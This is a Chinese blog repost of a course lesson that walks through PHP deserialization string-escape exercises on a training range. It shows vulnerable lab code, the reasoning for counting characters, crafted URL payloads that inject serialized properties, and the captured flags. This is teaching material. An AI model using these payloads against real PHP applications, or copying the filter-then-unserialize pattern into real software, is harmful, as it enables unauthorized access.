WEB渗透—PHP反序列化(八)

Web渗透—PHP反序列化        课程学习分享(课程非本人制作,仅提供学习分享)

靶场下载地址:GitHub - mcc0624/php_ser_Class: php反序列化靶场课程,基于课程制作的靶场

课程地址:PHP反序列化漏洞学习_哔哩哔_bilibili

十五、字符串逃逸例题-增多

1.实例代码

目标:判断是否pass=='escaping'

<?php
function filter($name){$safe=array("flag","php");$name=str_replace($safe,"hack",$name);return $name;
}
class test{var $user;var $pass='daydream';                  //pass默认值为'daydream'function __construct($user){$this->user=$user;}
}
$param=$_GET['param'];                     //$_GET[‘param’]获取值给$param
$param=serialize(new test($param));        //并放在实例化test里作为参数,实例化触发__construct赋值给user
$profile=unserialize(filter($param));      //对$param值进行安全性检查,filter把”flag”,”php”替换为”hack”,然后在反序列化
if ($profile->pass=='escaping'){           //判断pass是否为'escaping'echo file_get_contents("flag.php");
}
?>

2.解题过程

思路:

        1)字符串过滤后减少还是增多

        2)构造出关键成员属性序列化字符串

        3)增多则判断一次吐出多少个字符串

        4)构造payload并提交

构造关键成员属性序列化字符:

<?php
class test{var $user="123";         //任意字符var $pass='escaping';
}
echo serialize(new test());
?>

O:4:"test":2:{s:4:"user";s:3:"123";s:4:"pass";s:8:"escaping";}

php被替换成hack,字符串增多,会吐出字符串变成结构代码,一个php吐出1个字符串;

flag被替换成hack,字符串不变,无法吐出字符串变成结构代码

";s:4:"pass";s:8:"escaping";}

$user可控,我们通过param参数进行传参,我们需要将$pass及其参数吐出,同时我们需要补全前面$user的序列化结构,所以我们需要吐出29个字符

构造payload:

URL?param=phpphpphpphpphpphpphpphpphpphpphpphpphpphpphpphpphpphpphpphpphpphpphpphpphpphpphpphpphp";s:4:"pass";s:8:"escaping";}

3.回显结果

利用构造的pyload进行参数传递,得到flag(页面无法直接回显,需要查看网页源代码)

ctfstu{5c202c62-7567-4fa0-a370-134fe9d16ce7}

十六、字符串逃逸例题-减少

1.实例代码

目标:判断vip是否为

<?php
function filter($name){$safe=array("flag","php");$name=str_replace($safe,"hk",$name);return $name;
}
class test{var $user;var $pass;var $vip = false ;                     //vip默认值为falsefunction __construct($user,$pass){$this->user=$user;$this->pass=$pass;}
}
$param=$_GET['user'];
$pass=$_GET['pass'];
$param=serialize(new test($param,$pass));
$profile=unserialize(filter($param));      //对$parm值'user'进行安全性检查,filter把'flag','php'替换为'hk',然后在反序列化
if ($profile->vip){                        //判断vip值是否为真echo file_get_contents("flag.php");
}
?>

2.解题过程

思路:

        1)字符串过滤后减少还是增多

        2)构造出关键成员属性序列化字符串

        3)减少则判断吃掉的内容,并计算长度

        4)构造pyload并提交

构造关键成员属性序列化字符:

<?php
class test{var $user = '123';          //任意字符var $pass = '123';          //任意字符var $vip = true;
}
echo serialize(new test());
?>

O:4:"test":3:{s:4:"user";s:3:"123";s:4:"pass";s:3:"123";s:3:"vip";b:1;}

php被替换成hk,字符串减少,会吃掉字符串变成结构代码,一个php吃掉1个字符串;

flag被替换成hk,字符串减少,会吃掉字符串变成结构代码,一个flag吃掉2个字符串

";s:4:"pass";s:3:"123";s:3:"vip";b:1;}

$user和$pass可控,我们通过user和pass参数进行传参,我们需要将$pass及其参数吃掉,只保留参数内容以及结构 " 符号,同时我们需要补全前面$user的序列化结构,所以我们需要吃掉19个字符(flag每次吃掉2个字符,吃19个字符最少要吃10次,所以我们会多吃1位,在后面字符位置补)

在PHP中,当进行序列化时,字符串的长度标识小于两位时会被算作两位的原因是为了确保序列化后的数据能够正确地被反序列化。在PHP的序列化中,字符串的长度使用一个表示字符数的整数来进行标识。

构造payload:

URL?user=flagflagflagflagflagflagflagflagflagflag&pass=1";s:4:"pass";s:3:"123";s:3:"vip";b:1;}

3.回显结果

利用构造的pyload进行参数传递,得到flag(页面无法直接回显,需要查看网页源代码)

ctfstu{5c202c62-7567-4fa0-a370-134fe9d16ce7}

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.mzph.cn/news/543126.shtml

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈email:809451989@qq.com,一经查实,立即删除!

相关文章

如何部署 Hyperic ,使得从内网监测外网服务器

如何部署 Hyperic ,使得从内网监测外网服务器

2019独角兽企业重金招聘Python工程师标准>>> 环境介绍&#xff1a; 外网服务器&#xff1a; www.InnovateDigital.com 用户名/密码 test/test 内网服务器&#xff1a;192.168.1.125 操作系统都是 Centos 7 64bit 过程&#xff1a; 下载 Hyperic 5.8.5 &#xff0c…
阅读更多...
tcp 发送 最大数据量_网络基础知识夯实总结(三):TCP协议

tcp 发送 最大数据量_网络基础知识夯实总结(三):TCP协议

近期分享的网络知识包括HTTP协议、DNS协议、HTTPS协议、TCP协议、IP协议、TCP/IP、Web攻击及其他协议。今天内容是TCP协议。TCP协议1. 传输层2. 作用提供可靠的字节流服务3. 大块数据分割成报文段(segment)4. 三次握手1) 发送端发带SYN标志的数据包给对方。2) 接收端收到后&…
阅读更多...
安卓开发语言php,go语言支持安卓开发吗

安卓开发语言php,go语言支持安卓开发吗

go语言支持安卓开发。使用golang开发android需要下载安装gomobile&#xff0c;然后有两种开发方式&#xff0c;分别为&#xff1a;1、原生应用开发&#xff1b;2、混合绑定开发。本教程操作环境&#xff1a;windows10系统、GO 1.11.2、thinkpad t480电脑。大概14年的时候go语言…
阅读更多...
解决python连接mysql,UTF-8乱码问题

解决python连接mysql,UTF-8乱码问题

在测试“Bluemix云端数据库服务ClearDB MySQL使用示例———Python开发投票程序”的程序时&#xff0c;从MySQL中读取的中文输出到网页显示都是问号&#xff0c;如下图&#xff1a; 解决方法&#xff1a; 产生乱码问题&#xff0c;通常都是由于几方面的编码不统一导致的&#x…
阅读更多...
Crawler - 如何爬取列表后进行文章的爬取

Crawler - 如何爬取列表后进行文章的爬取

2019独角兽企业重金招聘Python工程师标准>>> 已知BUG&#xff1a;(version:5) 1-爬取后生成的XML默认编码是Java环境决定导入数据库可能出问题 方法修改xml编码后导入 重点CL 和 CI命令 CL 是爬取List列表 会通过file生成文件 CI 中file是CL执行后生存的File文件 CL…
阅读更多...
程序员出差是去干什么_让我来告诉你,35岁以上的人都在干什么!

程序员出差是去干什么_让我来告诉你,35岁以上的人都在干什么!

欢迎关注专栏&#xff1a;里面定期分享Android和Flutter架构技术知识点及解析&#xff0c;还会不断更新的BATJ面试专题&#xff0c;欢迎大家前来探讨交流&#xff0c;如有好的文章也欢迎投稿。Android高级进阶​zhuanlan.zhihu.com让我来告诉你&#xff0c;35岁以上的人都在干什…
阅读更多...
opencv入门_【OpenCV入门之十八】通过形态学操作提取水平与垂直线

opencv入门_【OpenCV入门之十八】通过形态学操作提取水平与垂直线

小白导读学习计算机视觉最重要的能力应该就是编程了&#xff0c;为了帮助小伙伴尽快入门计算机视觉&#xff0c;小白准备了【OpenCV入门】系列。新的一年文章的内容进行了很大的完善&#xff0c;主要是借鉴了更多大神的文章&#xff0c;希望让小伙伴更加容易理解。如果小伙伴觉…
阅读更多...
【译】NoClassDefFoundError和ClassNotFoundException的不同

【译】NoClassDefFoundError和ClassNotFoundException的不同

本文翻译自&#xff1a;Difference between NoClassDefFoundError vs ClassNotFoundExcepiton in Java 如果JVM或者ClassLoader在加载类时找不到对应的类&#xff0c;就会引发NoClassDefFoundError和ClassNotFoundException&#xff0c;这两种错误都非常严重。由于不同的ClassL…
阅读更多...
Ubuntu上安装Robomongo及添加到启动器

Ubuntu上安装Robomongo及添加到启动器

到目前为止&#xff0c;Robomongo仍是MongoDB最好的客户端管理工具&#xff0c;如需在Ubuntu上安装Robomongo&#xff0c;可直接从官网下载.tar.gz压缩包进行解压&#xff0c;然后直接运行bin目录下的robomongo文件即可启动界面。例如我将下载下来的.tar.gz压缩包解压到/usr/lo…
阅读更多...
pagefile.sys and heberfil.sys

pagefile.sys and heberfil.sys

dub 删除heberfil.sys大文件的方法 方法1:Windows/system32中的cmd.exe 输入 powercfg -h off&#xff0c;即可关闭休眠功能&#xff0c;同时 Hiberfil.sys 文件也会自动删除。 方法2:运行命令gpedit.msc打开策略组 依次打开Computer Configuration——Administrative Template…
阅读更多...
加密生成指定长度_3分钟短文 | PHP伪随机Token生成器,实地测试,效果感人!

加密生成指定长度_3分钟短文 | PHP伪随机Token生成器,实地测试,效果感人!

引言我们经常可能会用到邀请码&#xff0c;邮件验证码&#xff0c;或者需要使用unique 字符串标记用户属性的情况。今天我们且不说高深的“全局唯一ID”的生成方案&#xff0c;我们说一个简单的&#xff0c;如何生成一个唯一的&#xff0c;随机的&#xff0c;数组字母组成的字符…
阅读更多...
《Java高级程序设计》期末作业【2】-进度安排

《Java高级程序设计》期末作业【2】-进度安排

计算器项目计划进度安排&#xff1a; 项目成员&#xff1a;潘世林 何青 柴晓光 张峰转载于:https://www.cnblogs.com/panshilin/p/5578496.html
阅读更多...
python find不区分大小写_牛鹭学院:Python基础了解

python find不区分大小写_牛鹭学院:Python基础了解

本文来自牛鹭学院学员&#xff1a;田雨python初印象Python 是一种解释型语言&#xff1a; 这意味着开发过程中没有了编译这个环节。类似于PHP和Perl语言。Python 是交互式语言&#xff1a; 在一个 Python 提示符 >>> 后直接执行代码。Python 是面向对象语言: 这意味着…
阅读更多...
Spring+Quartz(一)

Spring+Quartz(一)

2019独角兽企业重金招聘Python工程师标准>>> Quartz是一个非常优秀的任务调度引擎&#xff0c;详情请见官网:http://www.quartz-scheduler.org/ 而Spring很好地集成了Quartz&#xff0c;为企业级的任务调度提供了方便。 下面先看一个实现了Job接口的任务HelloWorldJ…
阅读更多...
linux sudo 版本,Linu下如何升级当前sudo版本

linux sudo 版本,Linu下如何升级当前sudo版本

Sudo 的全称是“superuserdo”&#xff0c;它是Linux系统管理指令&#xff0c;允许用户在不需要切换环境的前提下以其它用户的权限运行应用程序或命令&#xff0c;通常是以 root 用户身份运行命令&#xff0c;以减少 root 用户的登录和管理时间&#xff0c;同时提高安全性。该漏…
阅读更多...
LaTeX技巧205:使用split输入多行公式技巧

LaTeX技巧205:使用split输入多行公式技巧

我们在输入多行公式的时候&#xff0c;split&#xff0c;array&#xff0c;multiline&#xff0c;align&#xff0c;aligned等等都是我们可以选用的环境&#xff0c;这里介绍split的使用方法。演示效果图&#xff1a;演示代码&#xff1a;\documentclass{article}\pagestyle{em…
阅读更多...
linux纯内核直接用吗,Linux:为啥内核有的变量没有初始化就敢直接使用?

linux纯内核直接用吗,Linux:为啥内核有的变量没有初始化就敢直接使用?

一、问题为啥内核有的变量没有初始化就敢直接使用&#xff1f;二、分析看上图&#xff0c;其中的5747行的变量nid的确没有定义&#xff0c;就直接使用了&#xff0c;这么做没有问题吗&#xff1f;其实大家仔细看一下&#xff0c;5765行是一个宏&#xff0c;到内核源码去找该宏的…
阅读更多...
sdr 软件_【火腿专题】购买软件定义无线电(SDR)还是传统无线电台?追求欲望无止境...

sdr 软件_【火腿专题】购买软件定义无线电(SDR)还是传统无线电台?追求欲望无止境...

软件定义无线电与传统无线电选择作者&#xff1a;Onno VK6FLAB有一段时间&#xff0c;我一直在解释软件无线电(SDR)的一些内部工作方式是如何运作的&#xff0c;以便深入了解原因和方法的细节。这种探索是在一个新世界的背景下进行的&#xff0c;在这个世界里&#xff0c;有无数…
阅读更多...
linux文本运行层次,Linux基础知识之---文件系统层级结构

linux文本运行层次,Linux基础知识之---文件系统层级结构

#Linux基础知识之---文件系统层级结构(Linux系统)[基础知识&#xff0c;文件系统&#xff0c;层级结构&#xff0c;FHS]一切皆文件&#xff1a; 在Linux中&#xff0c;无论是目录、配置、cpu、内存、键盘、鼠标、或者运行中的系统及内核、甚至临时缓存也都有对应的文件。“一切…
阅读更多...
服务器搭建-Linux基础知识

服务器搭建-Linux基础知识

服务器搭建还是需要一些Linux知识的&#xff0c;这节就聊点基础的。 文件权限操作 查看权限 Linux中每个文件对每个用户来说都有对应的权限&#xff0c;在任一路径中输入ll就可以查看这些信息&#xff1a; rootip-*** /usr/local # ll total 32K drwxr-xr-x 2 root root 4.0K J…
阅读更多...
推荐文章
最新文章

Copyright @ 2022~2023